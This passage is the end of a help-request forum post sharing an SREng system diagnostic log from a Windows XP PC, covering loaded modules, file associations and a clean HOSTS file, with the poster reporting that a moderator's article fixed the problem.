  [C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
  [C:\Program Files\Common Files\Symantec Shared\ccL40.dll] [Symantec Corporation, 104.0.11.1]
  [C:\Program Files\Common Files\Symantec Shared\ccVrTrst.dll] [Symantec Corporation, 104.0.11.1]
  [C:\Program Files\Common Files\Symantec Shared\ccSet.dll] [Symantec Corporation, 104.0.11.1]
  [C:\PROGRA~1\COMMON~1\SYMANT~1\CCALERT.DLL] [Symantec Corporation, 104.0.11.1]
  [C:\PROGRA~1\COMMON~1\SYMANT~1\CCEMLPXY.DLL] [Symantec Corporation, 104.0.11.1]
  [C:\WINDOWS\system32\SYMREDIR.DLL] [Symantec Corporation, 6.0.4.402]
  [C:\Program Files\Common Files\Symantec Shared\ccSetEvt.dll] [Symantec Corporation, 104.0.11.1]
  [C:\Program Files\Common Files\Symantec Shared\ccProSub.dll] [Symantec Corporation, 104.0.11.1]
  [C:\Program Files\Symantec AntiVirus\SavEmail.dll] [Symantec Corporation, 10.1.5.5000]
[PID: 1132][C:\PROGRA~1\SYMANT~2\vptray.exe] [Symantec Corporation, 10.1.5.5000]
  [C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
  [C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
  [C:\Program Files\Common Files\Symantec Shared\ccL40.dll] [Symantec Corporation, 104.0.11.1]
  [C:\Program Files\Symantec AntiVirus\SAVRT32.DLL] [Symantec Corporation, 9.7.2.3]
  [C:\Program Files\Common Files\Symantec Shared\ccSetEvt.dll] [Symantec Corporation, 104.0.11.1]
  [C:\Program Files\Common Files\Symantec Shared\ccVrTrst.dll] [Symantec Corporation, 104.0.11.1]
  [C:\Program Files\Common Files\Symantec Shared\ccProSub.dll] [Symantec Corporation, 104.0.11.1]
  [C:\Program Files\Common Files\Symantec Shared\ccAlert.dll] [Symantec Corporation, 104.0.11.1]
  [C:\Program Files\Symantec AntiVirus\Cliscan.dll] [Symantec Corporation, 10.1.5.5000]
  [C:\Program Files\Symantec AntiVirus\NAVNTUTL.DLL] [Symantec Corporation, 10.1.5.5000]
  [C:\WINDOWS\system32\sfc_os.dll] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\Program Files\Common Files\Symantec Shared\ccSet.dll] [Symantec Corporation, 104.0.11.1]
  [C:\WINDOWS\system32\UxTheme.dll] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\Program Files\Symantec AntiVirus\Cliproxy.dll] [Symantec Corporation, 10.1.5.5000]
[PID: 1728][C:\Program Files\360safe\safemon\360Tray.exe] [奇虎网, 3, 3, 0, 1005]
  [C:\Program Files\360safe\safemon\SafeKrnl.dll] [奇虎网, 3, 2, 0, 1001]
  [C:\Program Files\360safe\AntiAdwa.dll] [360Safe.com, 3, 3, 0, 1004]
[PID: 2004][C:\WINDOWS\system32\ctfmon.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\WINDOWS\system32\UxTheme.dll] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 2240][C:\WINDOWS\system32\conime.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\WINDOWS\system32\UxTheme.dll] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 2272][C:\Program Files\Internet Explorer\IEXPLORE.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\WINDOWS\system32\UxTheme.dll] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll] [Adobe Systems Incorporated, 7.0.0.2004121400]
  [C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
  [C:\WINDOWS\system32\sfc_os.dll] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\WINDOWS\system32\Macromed\Flash\Flash9b.ocx] [Adobe Systems, Inc., 9,0,28,0]
[PID: 3564][C:\WINDOWS\system32\taskmgr.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\WINDOWS\system32\UxTheme.dll] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 4048][C:\WINDOWS\system32\notepad.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\WINDOWS\system32\UxTheme.dll] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 660][C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\桌面\sreng2\SREng.EXE] [Smallfrogs Studio, 2.4.12.806]
  [C:\WINDOWS\system32\UxTheme.dll] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\WINDOWS\system32\sfc_os.dll] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]

==================================
文件关联
.TXT Error. [C:\WINDOWS\NOTEPAD.EXE %1]
.EXE OK. ["%1" %*]
.COM OK. ["%1" %*]
.PIF OK. ["%1" %*]
.REG OK. [regedit.exe "%1"]
.BAT OK. ["%1" %*]
.SCR OK. ["%1" /S]
.CHM Error. [C:\WINDOWS\hh.exe %1]
.HLP Error. [C:\WINDOWS\winhlp32.exe %1]
.INI Error. [C:\WINDOWS\NOTEPAD.EXE %1]
.INF Error. [C:\WINDOWS\NOTEPAD.EXE %1]
.VBS OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.JS  OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.LNK OK. [{00021401-0000-0000-C000-000000000046}]

==================================
Winsock 提供者
N/A

==================================
Autorun.inf
N/A

==================================
HOSTS 文件
127.0.0.1    localhost

==================================
API HOOK
N/A

==================================
隐藏进程
N/A

==================================


[/CODE]

Hoping an expert can help solve this, thanks!
I read the moderator's article
http://forum.ikaka.com/topic.asp?board=28&artid=8296495
and the problem is solved. Thanks!!!